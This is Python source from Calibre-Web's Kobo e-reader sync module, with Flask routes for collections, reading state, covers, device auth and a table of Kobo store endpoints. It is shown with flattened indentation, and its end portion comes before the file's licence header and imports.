if request.method == "DELETE":
abort(405)
name, items = None, None
try:
shelf_request = request.json
name = shelf_request["Name"]
items = shelf_request["Items"]
if not name:
raise TypeError
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags request.")
abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.name == name, ub.Shelf.user_id ==
current_user.id).one_or_none()
if shelf and not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to create shelf.")
if not shelf:
shelf = ub.Shelf(user_id=current_user.id, name=name, uuid=str(uuid.uuid4()))
ub.session.add(shelf)
items_unknown_to_calibre = add_items_to_shelf(items, shelf)
if items_unknown_to_calibre:
log.debug("Received request to add unknown books to a collection. Silently ignoring items.")
ub.session_commit()
return make_response(jsonify(str(shelf.uuid)), 201)
@kobo.route("/v1/library/tags/<tag_id>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def HandleTagUpdate(tag_id):
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug("Received Kobo tag update request on a collection unknown to CalibreWeb")
if config.config_kobo_proxy:
return redirect_or_proxy_request()
else:
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
if request.method == "DELETE":
shelf_lib.delete_shelf_helper(shelf)
else:
name = None
try:
shelf_request = request.json
name = shelf_request["Name"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags rename request.")
abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
shelf.name = name
ub.session.merge(shelf)
ub.session_commit()
return make_response(' ', 200)
# Adds items to the given shelf.
def add_items_to_shelf(items, shelf):
book_ids_already_in_shelf = set([book_shelf.book_id for book_shelf in shelf.books])
items_unknown_to_calibre = []
for item in items:
try:
if item["Type"] != "ProductRevisionTagItem":
items_unknown_to_calibre.append(item)
continue
book = calibre_db.get_book_by_uuid(item["RevisionId"])
if not book:
items_unknown_to_calibre.append(item)
continue
book_id = book.id
if book_id not in book_ids_already_in_shelf:
shelf.books.append(ub.BookShelf(book_id=book_id))
except KeyError:
items_unknown_to_calibre.append(item)
return items_unknown_to_calibre
@kobo.route("/v1/library/tags/<tag_id>/items", methods=["POST"])
@requires_kobo_auth
def HandleTagAddItem(tag_id):
items = None
try:
tag_request = request.json
items = tag_request["Items"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug("Received Kobo request on a collection unknown to CalibreWeb")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
items_unknown_to_calibre = add_items_to_shelf(items, shelf)
if items_unknown_to_calibre:
log.debug("Received request to add an unknown book to a collection. Silently ignoring item.")
ub.session.merge(shelf)
ub.session_commit()
return make_response('', 201)
@kobo.route("/v1/library/tags/<tag_id>/items/delete", methods=["POST"])
@requires_kobo_auth
def HandleTagRemoveItem(tag_id):
items = None
try:
tag_request = request.json
items = tag_request["Items"]
except (KeyError, TypeError):
log.debug("Received malformed v1/library/tags/<tag_id>/items/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
shelf = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == tag_id,
ub.Shelf.user_id == current_user.id).one_or_none()
if not shelf:
log.debug(
"Received a request to remove an item from a Collection unknown to CalibreWeb.")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(shelf):
abort(401, description="User is unauthaurized to edit shelf.")
items_unknown_to_calibre = []
for item in items:
try:
if item["Type"] != "ProductRevisionTagItem":
items_unknown_to_calibre.append(item)
continue
book = calibre_db.get_book_by_uuid(item["RevisionId"])
if not book:
items_unknown_to_calibre.append(item)
continue
shelf.books.filter(ub.BookShelf.book_id == book.id).delete()
except KeyError:
items_unknown_to_calibre.append(item)
ub.session_commit()
if items_unknown_to_calibre:
log.debug("Received request to remove an unknown book to a collecition. Silently ignoring item.")
return make_response('', 200)
# Add new, changed, or deleted shelves to the sync_results.
# Note: Public shelves that aren't owned by the user aren't supported.
def sync_shelves(sync_token, sync_results, only_kobo_shelves=False):
new_tags_last_modified = sync_token.tags_last_modified
for shelf in ub.session.query(ub.ShelfArchive).filter(
func.datetime(ub.ShelfArchive.last_modified) > sync_token.tags_last_modified,
ub.ShelfArchive.user_id == current_user.id
):
new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
sync_results.append({
"DeletedTag": {
"Tag": {
"Id": shelf.uuid,
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
}
}
})
extra_filters = []
if only_kobo_shelves:
for shelf in ub.session.query(ub.Shelf).filter(
func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
ub.Shelf.user_id == current_user.id,
not ub.Shelf.kobo_sync
):
sync_results.append({
"DeletedTag": {
"Tag": {
"Id": shelf.uuid,
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified)
}
}
})
extra_filters.append(ub.Shelf.kobo_sync)
if sqlalchemy_version2:
shelflist = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*extra_filters
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
else:
shelflist = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > sync_token.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > sync_token.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*extra_filters
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
for shelf in shelflist:
if not shelf_lib.check_shelf_view_permissions(shelf):
continue
new_tags_last_modified = max(shelf.last_modified, new_tags_last_modified)
tag = create_kobo_tag(shelf)
if not tag:
continue
if shelf.created > sync_token.tags_last_modified:
sync_results.append({
"NewTag": tag
})
else:
sync_results.append({
"ChangedTag": tag
})
sync_token.tags_last_modified = new_tags_last_modified
ub.session_commit()
# Creates a Kobo "Tag" object from a ub.Shelf object
def create_kobo_tag(shelf):
tag = {
"Created": convert_to_kobo_timestamp_string(shelf.created),
"Id": shelf.uuid,
"Items": [],
"LastModified": convert_to_kobo_timestamp_string(shelf.last_modified),
"Name": shelf.name,
"Type": "UserTag"
}
for book_shelf in shelf.books:
book = calibre_db.get_book(book_shelf.book_id)
if not book:
log.info(u"Book (id: %s) in BookShelf (id: %s) not found in book database", book_shelf.book_id, shelf.id)
continue
tag["Items"].append(
{
"RevisionId": book.uuid,
"Type": "ProductRevisionTagItem"
}
)
return {"Tag": tag}
@kobo.route("/v1/library/<book_uuid>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def HandleStateRequest(book_uuid):
book = calibre_db.get_book_by_uuid(book_uuid)
if not book or not book.data:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
kobo_reading_state = get_or_create_reading_state(book.id)
if request.method == "GET":
return jsonify([get_kobo_reading_state_response(book, kobo_reading_state)])
else:
update_results_response = {"EntitlementId": book_uuid}
try:
request_data = request.json
request_reading_state = request_data["ReadingStates"][0]
request_bookmark = request_reading_state["CurrentBookmark"]
if request_bookmark:
current_bookmark = kobo_reading_state.current_bookmark
current_bookmark.progress_percent = request_bookmark["ProgressPercent"]
current_bookmark.content_source_progress_percent = request_bookmark["ContentSourceProgressPercent"]
location = request_bookmark["Location"]
if location:
current_bookmark.location_value = location["Value"]
current_bookmark.location_type = location["Type"]
current_bookmark.location_source = location["Source"]
update_results_response["CurrentBookmarkResult"] = {"Result": "Success"}
request_statistics = request_reading_state["Statistics"]
if request_statistics:
statistics = kobo_reading_state.statistics
statistics.spent_reading_minutes = int(request_statistics["SpentReadingMinutes"])
statistics.remaining_time_minutes = int(request_statistics["RemainingTimeMinutes"])
update_results_response["StatisticsResult"] = {"Result": "Success"}
request_status_info = request_reading_state["StatusInfo"]
if request_status_info:
book_read = kobo_reading_state.book_read_link
new_book_read_status = get_ub_read_status(request_status_info["Status"])
if new_book_read_status == ub.ReadBook.STATUS_IN_PROGRESS \
and new_book_read_status != book_read.read_status:
book_read.times_started_reading += 1
book_read.last_time_started_reading = datetime.datetime.utcnow()
book_read.read_status = new_book_read_status
update_results_response["StatusInfoResult"] = {"Result": "Success"}
except (KeyError, TypeError, ValueError, StatementError):
log.debug("Received malformed v1/library/<book_uuid>/state request.")
ub.session.rollback()
abort(400, description="Malformed request data is missing 'ReadingStates' key")
ub.session.merge(kobo_reading_state)
ub.session_commit()
return jsonify({
"RequestResult": "Success",
"UpdateResults": [update_results_response],
})
def get_read_status_for_kobo(ub_book_read):
enum_to_string_map = {
None: "ReadyToRead",
ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
ub.ReadBook.STATUS_FINISHED: "Finished",
ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
}
return enum_to_string_map[ub_book_read.read_status]
def get_ub_read_status(kobo_read_status):
string_to_enum_map = {
None: None,
"ReadyToRead": ub.ReadBook.STATUS_UNREAD,
"Finished": ub.ReadBook.STATUS_FINISHED,
"Reading": ub.ReadBook.STATUS_IN_PROGRESS,
}
return string_to_enum_map[kobo_read_status]
def add_synced_books(book_id):
synced_book = ub.KoboSyncedBooks()
synced_book.user_id = current_user.id
synced_book.book_id = book_id
ub.session.add(synced_book)
try:
ub.session.commit()
except Exception:
ub.session.rollback()
def get_or_create_reading_state(book_id):
book_read = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id,
ub.ReadBook.user_id == current_user.id).one_or_none()
if not book_read:
book_read = ub.ReadBook(user_id=current_user.id, book_id=book_id)
if not book_read.kobo_reading_state:
kobo_reading_state = ub.KoboReadingState(user_id=book_read.user_id, book_id=book_id)
kobo_reading_state.current_bookmark = ub.KoboBookmark()
kobo_reading_state.statistics = ub.KoboStatistics()
book_read.kobo_reading_state = kobo_reading_state
ub.session.add(book_read)
ub.session_commit()
return book_read.kobo_reading_state
def get_kobo_reading_state_response(book, kobo_reading_state):
return {
"EntitlementId": book.uuid,
"Created": convert_to_kobo_timestamp_string(book.timestamp),
"LastModified": convert_to_kobo_timestamp_string(kobo_reading_state.last_modified),
# AFAICT PriorityTimestamp is always equal to LastModified.
"PriorityTimestamp": convert_to_kobo_timestamp_string(kobo_reading_state.priority_timestamp),
"StatusInfo": get_status_info_response(kobo_reading_state.book_read_link),
"Statistics": get_statistics_response(kobo_reading_state.statistics),
"CurrentBookmark": get_current_bookmark_response(kobo_reading_state.current_bookmark),
}
def get_status_info_response(book_read):
resp = {
"LastModified": convert_to_kobo_timestamp_string(book_read.last_modified),
"Status": get_read_status_for_kobo(book_read),
"TimesStartedReading": book_read.times_started_reading,
}
if book_read.last_time_started_reading:
resp["LastTimeStartedReading"] = convert_to_kobo_timestamp_string(book_read.last_time_started_reading)
return resp
def get_statistics_response(statistics):
resp = {
"LastModified": convert_to_kobo_timestamp_string(statistics.last_modified),
}
if statistics.spent_reading_minutes:
resp["SpentReadingMinutes"] = statistics.spent_reading_minutes
if statistics.remaining_time_minutes:
resp["RemainingTimeMinutes"] = statistics.remaining_time_minutes
return resp
def get_current_bookmark_response(current_bookmark):
resp = {
"LastModified": convert_to_kobo_timestamp_string(current_bookmark.last_modified),
}
if current_bookmark.progress_percent:
resp["ProgressPercent"] = current_bookmark.progress_percent
if current_bookmark.content_source_progress_percent:
resp["ContentSourceProgressPercent"] = current_bookmark.content_source_progress_percent
if current_bookmark.location_value:
resp["Location"] = {
"Value": current_bookmark.location_value,
"Type": current_bookmark.location_type,
"Source": current_bookmark.location_source,
}
return resp
@kobo.route("/<book_uuid>/<width>/<height>/<isGreyscale>/image.jpg", defaults={'Quality': ""})
@kobo.route("/<book_uuid>/<width>/<height>/<Quality>/<isGreyscale>/image.jpg")
@requires_kobo_auth
def HandleCoverImageRequest(book_uuid, width, height,Quality, isGreyscale):
book_cover = helper.get_book_cover_with_uuid(
book_uuid, use_generic_cover_on_failure=False
)
if not book_cover:
if config.config_kobo_proxy:
log.debug("Cover for unknown book: %s proxied to kobo" % book_uuid)
return redirect(KOBO_IMAGEHOST_URL +
"/{book_uuid}/{width}/{height}/false/image.jpg".format(book_uuid=book_uuid,
width=width,
height=height), 307)
else:
log.debug("Cover for unknown book: %s requested" % book_uuid)
# additional proxy request make no sense, -> direct return
return make_response(jsonify({}))
log.debug("Cover request received for book %s" % book_uuid)
return book_cover
@kobo.route("")
def TopLevelEndpoint():
return make_response(jsonify({}))
@kobo.route("/v1/library/<book_uuid>", methods=["DELETE"])
@requires_kobo_auth
def HandleBookDeletionRequest(book_uuid):
log.info("Kobo book deletion request received for book %s" % book_uuid)
book = calibre_db.get_book_by_uuid(book_uuid)
if not book:
log.info(u"Book %s not found in database", book_uuid)
return redirect_or_proxy_request()
book_id = book.id
archived_book = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.book_id == book_id)
.first()
)
if not archived_book:
archived_book = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
archived_book.is_archived = True
archived_book.last_modified = datetime.datetime.utcnow()
ub.session.merge(archived_book)
ub.session_commit()
return ("", 204)
# TODO: Implement the following routes
@kobo.route("/v1/library/<dummy>", methods=["DELETE", "GET"])
def HandleUnimplementedRequest(dummy=None):
log.debug("Unimplemented Library Request received: %s", request.base_url)
return redirect_or_proxy_request()
# TODO: Implement the following routes
@kobo.route("/v1/user/loyalty/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/user/profile", methods=["GET", "POST"])
@kobo.route("/v1/user/wishlist", methods=["GET", "POST"])
@kobo.route("/v1/user/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/analytics/<dummy>", methods=["GET", "POST"])
def HandleUserRequest(dummy=None):
log.debug("Unimplemented User Request received: %s", request.base_url)
return redirect_or_proxy_request()
@kobo.route("/v1/products/<dummy>/prices", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/recommendations", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/nextread", methods=["GET", "POST"])
@kobo.route("/v1/products/<dummy>/reviews", methods=["GET", "POST"])
@kobo.route("/v1/products/books/external/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/series/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/books/<dummy>", methods=["GET", "POST"])
@kobo.route("/v1/products/dailydeal", methods=["GET", "POST"])
@kobo.route("/v1/products", methods=["GET", "POST"])
def HandleProductsRequest(dummy=None):
log.debug("Unimplemented Products Request received: %s", request.base_url)
return redirect_or_proxy_request()
def make_calibre_web_auth_response():
# As described in kobo_auth.py, CalibreWeb doesn't make use practical use of this auth/device API call for
# authentation (nor for authorization). We return a dummy response just to keep the device happy.
content = request.get_json()
AccessToken = base64.b64encode(os.urandom(24)).decode('utf-8')
RefreshToken = base64.b64encode(os.urandom(24)).decode('utf-8')
return make_response(
jsonify(
{
"AccessToken": AccessToken,
"RefreshToken": RefreshToken,
"TokenType": "Bearer",
"TrackingId": str(uuid.uuid4()),
"UserKey": content['UserKey'],
}
)
)
@kobo.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def HandleAuthRequest():
log.debug('Kobo Auth request')
if config.config_kobo_proxy:
try:
return redirect_or_proxy_request()
except Exception:
log.error("Failed to receive or parse response from Kobo's auth endpoint. Falling back to un-proxied mode.")
return make_calibre_web_auth_response()
@kobo.route("/v1/initialization")
@requires_kobo_auth
def HandleInitRequest():
log.info('Init')
kobo_resources = None
if config.config_kobo_proxy:
try:
store_response = make_request_to_kobo_store()
store_response_json = store_response.json()
if "Resources" in store_response_json:
kobo_resources = store_response_json["Resources"]
except Exception:
log.error("Failed to receive or parse response from Kobo's init endpoint. Falling back to un-proxied mode.")
if not kobo_resources:
kobo_resources = NATIVE_KOBO_RESOURCES()
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
if ':' in request.host and not request.host.endswith(']'):
host = "".join(request.host.split(':')[:-1])
else:
host = request.host
calibre_web_url = "{url_scheme}://{url_base}:{url_port}".format(
url_scheme=request.scheme,
url_base=host,
url_port=config.config_external_port
)
log.debug('Kobo: Received unproxied request, changed request url to %s', calibre_web_url)
kobo_resources["image_host"] = calibre_web_url
kobo_resources["image_url_quality_template"] = unquote(calibre_web_url +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
Quality='{Quality}',
isGreyscale='isGreyscale'))
kobo_resources["image_url_template"] = unquote(calibre_web_url +
url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
isGreyscale='false'))
else:
kobo_resources["image_host"] = url_for("web.index", _external=True).strip("/")
kobo_resources["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
Quality='{Quality}',
isGreyscale='isGreyscale',
_external=True))
kobo_resources["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
auth_token=kobo_auth.get_auth_token(),
book_uuid="{ImageId}",
width="{width}",
height="{height}",
isGreyscale='false',
_external=True))
response = make_response(jsonify({"Resources": kobo_resources}))
response.headers["x-kobo-apitoken"] = "e30="
return response
@kobo.route("/download/<book_id>/<book_format>")
@requires_kobo_auth
@download_required
def download_book(book_id, book_format):
return get_download_link(book_id, book_format, "kobo")
def NATIVE_KOBO_RESOURCES():
return {
"account_page": "https://secure.kobobooks.com/profile",
"account_page_rakuten": "https://my.rakuten.co.jp/",
"add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
"affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
"audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
"authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/books/authors/recommendations",
"autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
"blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
"book": "https://storeapi.kobo.com/v1/products/books/{ProductId}",
"book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
"book_detail_page_rakuten": "https://books.rakuten.co.jp/rk/{crossrevisionid}",
"book_landing_page": "https://store.kobobooks.com/ebooks",
"book_subscription": "https://storeapi.kobo.com/v1/products/books/subscriptions",
"categories": "https://storeapi.kobo.com/v1/categories",
"categories_page": "https://store.kobobooks.com/ebooks/categories",
"category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
"category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
"category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
"checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
"configuration_data": "https://storeapi.kobo.com/v1/configuration",
"content_access_book": "https://storeapi.kobo.com/v1/products/books/{ProductId}/access",
"customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
"daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
"deals": "https://storeapi.kobo.com/v1/deals",
"delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
"delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/items/delete",
"device_auth": "https://storeapi.kobo.com/v1/auth/device",
"device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
"dictionary_host": "https://kbdownload1-a.akamaihd.net",
"discovery_host": "https://discovery.kobobooks.com",
"eula_page": "https://www.kobo.com/termsofuse?style=onestore",
"exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
"external_book": "https://storeapi.kobo.com/v1/products/books/external/{Ids}",
"facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
"featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
"featured_lists": "https://storeapi.kobo.com/v1/products/featured",
"free_books_page": {
"EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
"FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
"IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
"NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
"PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
},
"fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
"get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
"giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
"giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
"help_page": "https://www.kobo.com/help",
"kobo_audiobooks_enabled": "False",
"kobo_audiobooks_orange_deal_enabled": "False",
"kobo_audiobooks_subscriptions_enabled": "False",
"kobo_nativeborrow_enabled": "True",
"kobo_onestorelibrary_enabled": "False",
"kobo_redeem_enabled": "True",
"kobo_shelfie_enabled": "False",
"kobo_subscriptions_enabled": "False",
"kobo_superpoints_enabled": "False",
"kobo_wishlist_enabled": "True",
"library_book": "https://storeapi.kobo.com/v1/user/library/books/{LibraryItemId}",
"library_items": "https://storeapi.kobo.com/v1/user/library",
"library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
"library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
"library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
"library_sync": "https://storeapi.kobo.com/v1/library/sync",
"love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
"love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
"magazine_landing_page": "https://store.kobobooks.com/emagazines",
"notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
"oauth_host": "https://oauth.kobo.com",
"overdrive_account": "https://auth.overdrive.com/account",
"overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
"overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
"overdrive_thunder_host": "https://thunder.api.overdrive.com",
"password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
"post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
"privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
"product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
"product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
"product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
"product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
"products": "https://storeapi.kobo.com/v1/products",
"provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
"purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
"purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
"quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
"quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
"rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
"reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
"redeem_interstitial_page": "https://store.kobobooks.com",
"registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
"related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
"remaining_book_series": "https://storeapi.kobo.com/v1/products/books/series/{SeriesId}",
"rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
"review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
"shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
"sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
"social_authorization_host": "https://social.kobobooks.com:8443",
"social_host": "https://social.kobobooks.com",
"stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
"store_home": "www.kobo.com/{region}/{language}",
"store_host": "store.kobobooks.com",
"store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
"store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
"store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
"tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
"tags": "https://storeapi.kobo.com/v1/library/tags",
"taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
"update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
"use_one_store": "False",
"user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
"user_platform": "https://storeapi.kobo.com/v1/user/platform",
"user_profile": "https://storeapi.kobo.com/v1/user/profile",
"user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
"user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
"user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
"user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
"userguide_host": "https://kbdownload1-a.akamaihd.net",
"wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
}
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 shavitmichael, OzzieIsaacs
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub, csrf
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
KOBO_FORMATS = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
KOBO_STOREAPI_URL = "https://storeapi.kobo.com"
KOBO_IMAGEHOST_URL = "https://kbimages1-a.akamaihd.net"
SYNC_ITEM_LIMIT = 100
kobo = Blueprint("kobo", __name__, url_prefix="/kobo/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(kobo)
kobo_auth.register_url_value_preprocessor(kobo)
log = logger.create()
def get_store_url_for_current_request():
# Programmatically modify the current url to point to the official Kobo store
__, __, request_path_with_auth_token = request.full_path.rpartition("/kobo/")
__, __, request_path = request_path_with_auth_token.rstrip("?").partition(
"/"
)
return KOBO_STOREAPI_URL + "/" + request_path
CONNECTION_SPECIFIC_HEADERS = [
"connection",
"content-encoding",
"content-length",
"transfer-encoding",
]
def get_kobo_activated():
return config.config_kobo_sync
def make_request_to_kobo_store(sync_token=None):
outgoing_headers = Headers(request.headers)
outgoing_headers.remove("Host")
if sync_token:
sync_token.set_kobo_store_header(outgoing_headers)
store_response = requests.request(
method=request.method,
url=get_store_url_for_current_request(),
headers=outgoing_headers,
data=request.get_data(),
allow_redirects=False,
timeout=(2, 10)
)
return store_response
def redirect_or_proxy_request():
if config.config_kobo_proxy:
if request.method == "GET":
return redirect(get_store_url_for_current_request(), 307)
else:
# The Kobo device turns other request types into GET requests on redirects, so we instead proxy to the Kobo store ourselves.
store_response = make_request_to_kobo_store()
response_headers = store_response.headers
for header_key in CONNECTION_SPECIFIC_HEADERS:
response_headers.pop(header_key, default=None)
return make_response(
store_response.content, store_response.status_code, response_headers.items()
)
else:
return make_response(jsonify({}))
def convert_to_kobo_timestamp_string(timestamp):
try:
return timestamp.strftime("%Y-%m-%dT%H:%M:%SZ")
except AttributeError as exc:
log.debug("Timestamp not valid: {}".format(exc))
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@kobo.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def HandleSyncRequest():
sync_token = SyncToken.SyncToken.from_headers(request.headers)
log.info("Kobo library sync request received.")
log.debug("SyncToken: {}".format(sync_token))
if not current_app.wsgi_app.is_proxied:
log.debug('Kobo: Received unproxied request, changed request port to external server port')
# TODO: Limit the number of books return per sync call, and rely on the sync-continuatation header
# instead so that the device triggers another sync.
new_books_last_modified = sync_token.books_last_modified
new_books_last_created = sync_token.books_last_created
new_reading_state_last_modified = sync_token.reading_state_last_modified
new_archived_last_modified = datetime.datetime.min
sync_results = []
# We reload the book database so that the user get's a fresh view of the library
